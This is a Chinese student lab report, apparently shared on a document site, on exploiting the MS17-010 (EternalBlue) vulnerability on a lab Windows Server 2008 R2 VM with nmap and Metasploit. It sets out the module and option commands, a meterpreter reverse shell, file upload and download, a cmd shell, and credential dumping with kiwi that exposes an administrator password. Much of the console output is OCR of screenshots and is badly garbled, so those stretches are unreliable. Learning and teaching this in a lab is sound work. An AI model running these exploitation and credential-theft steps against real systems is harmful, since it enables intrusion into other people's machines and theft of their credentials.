实验系统漏洞攻击分析.docx

《实验系统漏洞攻击分析.docx》由会员分享，可在线阅读，更多相关《实验系统漏洞攻击分析.docx（13页珍藏版）》请在三一办公上搜索。

1、实验报告课程名称：计算机病毒与防治实验名称：系统漏洞攻击分析组 号：班 级：项目 负责人小组成员实验日期一、二、三、实验目的1、Metasploit的基本使用2、认识Windows服务器高危漏洞ms17-0103、使用Metasploit漏洞利用模块攻击windows服务器 实验要求Windows 系统、vmware15.0、KALIlinux、Server 2008 R2实验内容靶机：Windows server 2008R2 （IP:192.168.20.40）攻击机：Kali （IP:192.168.6.50）工具：nmap （这里主要用于漏洞扫描）、metasploit（msf）Met

2、asploit,简称msf，是一个几个信息收集，漏洞验证、漏洞利用后渗透模块的渗透测 试框架。1、进入msf输入 msfconsole2、使用msf模块use模块名optionset选项值run 或者 exploit使用模块：查看选项：设置选项：发起攻击： 三、实验步骤1、Windows服务器高危漏洞ms17-010基本情况介绍：（自己核查后，整理输入到此处）提到操作系统漏洞，大家肯定听说过耳熟能详的永恒之蓝（MS17-010）了，他的爆发源于 WannaCry勒索病毒的诞生。该病毒是不法分子利用NSA（National Security Agency，美国国家安全局）泄露的危险漏洞“Eter

3、nalBlue”（永恒之蓝）进行传播。勒索病毒肆虐，俨然是一场全球性互联网灾难，给广大电脑 用户造成了巨大损失。最新统计数据显示，100多个国家和地区超过10万台电脑遭到了勒索病毒攻 击、感染。勒索病毒是自熊猫烧香以来影响力最大的病毒之一。本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议2、用nmap的漏洞扫描模式，扫描靶机看靶机上是否有ms17-010漏洞 命令：nmap -script=vuln 192.168.20.40r(root&kali202Qi-L# nmap - -sc ript=VLiln 192.168.20 .60Starting Nmap

4、 7.91 ( https:/nmap.org ) at 2021-11-22 09:95 HKT-1AC Address : 0O:OC: 29 : C6:89: GA (VMwacq Host script results:| _samba - i/uln -cve - 2012 -1182: NT .STATUS. ACCESS_DENIED5mb-vuln-ms 10-054: false2smb vuln ms 10-051: NT_STATU_ACCESS_DENI：EDsmE-vuLn-ms :VLJLNFRARLF:| Remote Code Execution vulnera

5、bility In Microsoft SHBvl servers (rrsl7-0Lt)| State: VULNERABLEIDs: CVE:CVE-2017-0143Risk factor: HIGHA critical remote code execution vulnerability exists in Miercsoft SMBvl se rvsrs (ms 17-010).| Disclosure date : 2017-03-14Ref e rerces : v ra ry/secu rity/msl7-910.aspx_https:/eve.mil re.arg/cgi-

6、bin/cvenam&.cgi?name=CVE-2017-9143注：进入msf输入Msfconsole3、使用msf模块1)使用msf搜索ms17-010漏洞(操作结果截图)Diactasure D2017-03-H2017-03-142017-93-142017-11-15# NameG exploit/windaws/siTb/G10_eternalblue indows Kernel Pool Correption1 exploit/windows / s10_p sexecnergy/l-trnalChampion SMH Remote Windows Code l-xecutio

7、n2 auxi I iary/admin/5nib/B_010_caminand nergy/Eternatcriannpian SMB Remote Windows Command Execution3 auxiliary/scHnne r /srrtVmbJimUJHO4 exploit/windows/fileformat/of118825 auxiliary/admin/m55ql/m55ql e5calate_execute es CUTE AS6 auxilia ry/ad mi n/ms s ql/ms s ql_es calat e_exec u t e_a s_s qIi q

8、 Execute AS7 auxilia ry/admin/m5sql/mssql_Qnim_domain_accoLnts_sqlL MAMI- Windows Domain Account Hint me rationEauxi 11.ary/admLn/rnssql./ins5ql_en jm sql logins2)使用辅助模块，检查漏洞是否存在使用模块：use auxiliary/scanner/smb/smb_ms17_010(操作截图)m f6 use auxiliary/admin/smb/ms17_0L0_commandn)sT6 auxiliary(admin/snb/ii

9、slZ &lB command) |Ehl，打rnn+fRrlS 1 tfl Jfl S?设置选项：set RHOSTS 192.168.6.110(操作截图)btKVlLt_DtbLKLR 11UINROiservice d sting( SERVICE DISPLAY NAMEmaThie s rviSERVICE NAMEnoThe se rvi1 SMBDcmikainnoThe WindoSMBPassnoThe passwSMBSHAREC$yesThe nameSMBUsernoThe usernTHREADS1yesTIi 白 numb口WINPATHWINDOWSyesThp

10、 ncimemi5 f & au xil i a ry (a d min/ s mb / ms 17 _0 16_c o m ma nd) set r hosts 152.168.29.60rhosts = L92.1GB.2B.6B,时6 auxiliaryfadmin/smb/mslZ ftie coHiiand) = runf 192. I.G8.20.60:445-Target OS: Windows Server 2806 R2 Standard 760flr - 192.16&.2e.66:445-Unable to find sccesibLe namd pipe1*1 192.

11、158.20.60:445-Scanned 1 of 1 hosts (100 complete)* AuxiLiary module execution completedmsf6 an xil i a ry (a d min/ s mb / ms 17_9 lB_c o na nd) | 11 - - u . i* j.-ca Ax一 h y rt rc m . rr4、使用攻击模块使用模块：use exploit/windows/smb/ms17_010_psexec（操作截图）msf B e I g it wi nd t ws/s mh /ns 17_B 16 _ete rnal bl

12、 ue) use e Kpl a it /w ind d ws /smto /ms 17_010_t e rnalbl ui * Using tenfigured payload windows/x64/meterpreter/rGverse_tcpmsfB expIgitwindows/smh/ns 17 816 eternalblue) 查看选项:options设置选项：set RHOSTS 192.168.6.110（操作截图）VERIFY TAflGET trueyas4 vrirv h v n s je 、 m v w w emi、 w M i-i|x ua I vri I.J v

13、i M v hMQ6 R2r Windows L Windows Enfiedded Standard 7 target iKKhineSr Chsck if rsmto- OS rrsatchc-s sploit T-arget. Only affacts Window Sarwar 2006 R2r W indDws- L Windows Embedded Standard 7 target nochinos.Payload apt ions (win/mfi-tQ rpratcr/ rflvorsn_tcp J:Nanc-Current batting Roquirad D&script

14、icnEXITFUNC LUKI LPCfiTthr&ad I27.0.B.1 4444Exli tchnlqud (AeccpTsxJ! . sdhP Throad, pracKSr non) The listen dddres (an Interfsce iriay be spec!Tied) The listen portutowtic Tar牌tc-trnifllbliir)，wt rh&sts 12.166.2&.60nMb exploit (windcwi X-snh/i?17_0 Wrhsrats = 192.1G8.2&0橱6 exploit(windkotara/5nb/ X

15、hMt = 缶.土&.Qmsfg s-xpLoi t (windiiwi /-inb /bx：17 lJ etem-filblue-Si runStartedwsa等臼 TCP 192.1&a.2g.6E):445 - 152.163.20.60:45 192.169.20.60:445 192.1&3.2B.60!4i|5 - 192.163.20.6B!445 - 192.163.30.60:445 - 192.16a.2D.6E!445 - 192.21.2.6&：445 - 192.16fl .26.66:445 - 192.I6fl.2e.66：445 - 19Z.16A.25.65

16、：*45 - 192.16fl .26.66:445 - 192.I6fl.2e.66：445 - m.l6fi.2&.6&：44S -h-andlar an 电.&施.A: *44*Using au xil i-a ry/sc-annc-r/srrti/ smb_m5-1.7_01 as check-Hast is Tiksly VULflERAfiLE tD M517-01Q!-Scanned 1 of 1. hoslts | ID哓 ccHTplatPie Ea rgat is MuLn如也2.Connecting co targac Tar axplaltacLon.Connect I

17、anTor eloiEation.Targer OS selected alid Tar 05 Indlcaied byGORE 3 buTfsr duilflpWBE仞9 &0朋 尊湎网。玮IB 泗林睡MTarget archWindows- Sarvar20GB R2 Standard 7&3D x.64 64 bit)57 69 公36 30 3B37 循 30(36 bytK)6* 6T 77 73 20 29 52 32 2& 53 洲valid for 咐泗 reply53 65 7274 61 6e76 65 72 20&4 61 72 64indlstd by KE/RPCMf

18、lnctowis Ser睥 r 2 006 HZ Stands rd 76&9iTrying exploit with 12 Groon lloxatlon?.Sending all butof exploit p* k?t发起攻击：run 或者 exploit-Sending-Closing-Sending-SendinqSMBvl connect ion crQ 192.168.20.60:4444 ) dt 2注：运行成功会出现meterpreter 执行以不任务i）皆置此服务器嚣供甘0机仁息由DUO的M的IF地ill. IPw已启用buffersSMBv2 buffers-:祚础4攫尹

19、计阻机球L部归E- ；1 H,完整日喜工昨坦Sindels不壑WSS192.160.20.66192.168.20.68192.168.20.68192.1682060l?2.1fiS,20,6012.168,20,60192.168,-26,60152.168.20.60192.168.20.60L92.168.2O.6092.169.20.60192.168.29.60:445192.168.20.60:445SMlBv2final-Target arch selected valid for arch indicated by DCE/RPC reply -Trying exploit

20、with 12 broom Allocations.-Sendling all but last fragment of exploit packet -Starting nion-paged pool groonunglast fragunent of exploit packet!-Receiving response from exploit packet -ETERNALBLUE overwrite completed sue cess fully (0j !-Sending egg to corrupted connection.-Triqgerlng free of corrupt

21、ed buffer.Started bind TCP handler against 192a16B.20.60:4444Sending stage (200262 bytes I to 192160.20.60Meterpreter是Metasploit的一个扩展模块，可以调用Metasploit的一些功能，对目标系统进行更深入的渗透，如获取屏幕、上传/下载文件、创建持久后门等。5、使用抓屏命令screenshot对目标系统进行截屏rneiienorwtQr screenshot6、上传/下载文件使用叩load和download两个命令进行上床下载上传当前目录下的文件(1101：。rc旦to

22、r a upload/root/.BijrpSui-tp-gn.jpg.redi5cli_hi5toryDesktopmXp-ICEsutho rityJavar 55hRacument口ul.XaLtiority.lesslist.viminfoDownloadsml.ZAP.local.wpscanMusicsa1.bashrc.maltego xsession-errorsPicturessut.cache.rrazilla.xsession-errars.oldPu;Liesur.canfig.ms f4.zsh histaryTomplatesw1.dmrc.npm.zsh reVi

23、deosi一 face.p nof ilo1234.exeaquatonoMi一 face. Leon.python_historyCVE-2021-3129hydia_dli职坨p日tei- ? upload/root/1234 ee* uploads ng : /root/1234 Pexe- 1234-ee* Uploaded 72.07 KiB of 72.07KiB (100.0):/root/1234.exe -1234.exe1：* up loaded : /root/1234 .exe- L234.exe下载靶机C盘下的hello.txt文件（操作结果截图）ilii r:c)壹

24、 /root/test.txt* Dowrloaded 12.GO B of 12.00 B (10O.: c:/test.txt - /root/test.txt* download : c:/test.txt - /root/test.txt吨也口 Jkali 2 kali +I(raot kalZ&2&) - I# cat rgtFtgt .txt you are liackI(i uuLkali2&2&) -* 1 # 7、使用shell命令获取靶机的cmd权限，再使用ipconfig命令查询靶机网络地址信息 (操作结果截图)吨如口x she 11 cmdProcess 1960 cr

25、eaTGd,Channel 3 created.Hlcrasofl Widows 卜汾 6.1.76001”曩 (c J 2009 Microsoft Co rpoi a Lion i zt i C:Windowssystem32ip con ip canip仪八门具踮QTbi ,C:Wlndowssystem32lpconflg ipconfigWiidaws IP T* :见引即士斗l*务” U DNS 却:玖妒*GJ5PvG 4:feSO; ;c4Gl;efel;55fb;922ni4IPv4 p ; 192.168.20.60 BK&:255.255.255.0ty&-:8、获取用户密

26、码（使用load kiwi命令获取靶机登录用户口令，使用creds_all命令显示用户口令） （操作结果截图）DomainPasswo rdUsernameDomainPasswordAdministrator WIN-GFM00B8P58812356.abcDkerberos credentialsUsernameWCIF?K3ROUP（操作结果截图）（操作结果截图）metEEi迫teaArchitectureSystem LaniquageDomaxnAdministratornullWTM-GFmOR8P588 123456 .abr：DSQR GR.QLPWTN-GF100B8P583

27、wdigest credentialsnullnullWIN-GFMOOB8P588Jtspkg c(nmll)null9、查询靶机系统信息（使用sysinfo命令）ComputersysinfoLagged On Userspkterprete rWindows 2G08 R2 lioirvjiA用户；0 M，伊DE3X1/11/4 31:01 g/14，3:( xce.?/K jk 8mm” 33:0?龄湖4】3S 2CCI/II/4 31:013X1/11/4 31:01 xeiavM io s& 2Cei/U/l 30:92wai/1 io： n zcei/u/4 i：oi：l 21 囹 21：&3XKI 心 16.S0i a 2u a 幻妨&.JJCURITYWindows Server2008StandardO rootkab2020: -ftksM. rdesktop-192163.2060rd.teop-1924G8J0.0vvvktaxl.txl 攸村日 12亨节五、实验总结及存在的问题思考一下怎么修复ms17-010漏洞，面对系统漏洞我们应该怎么做?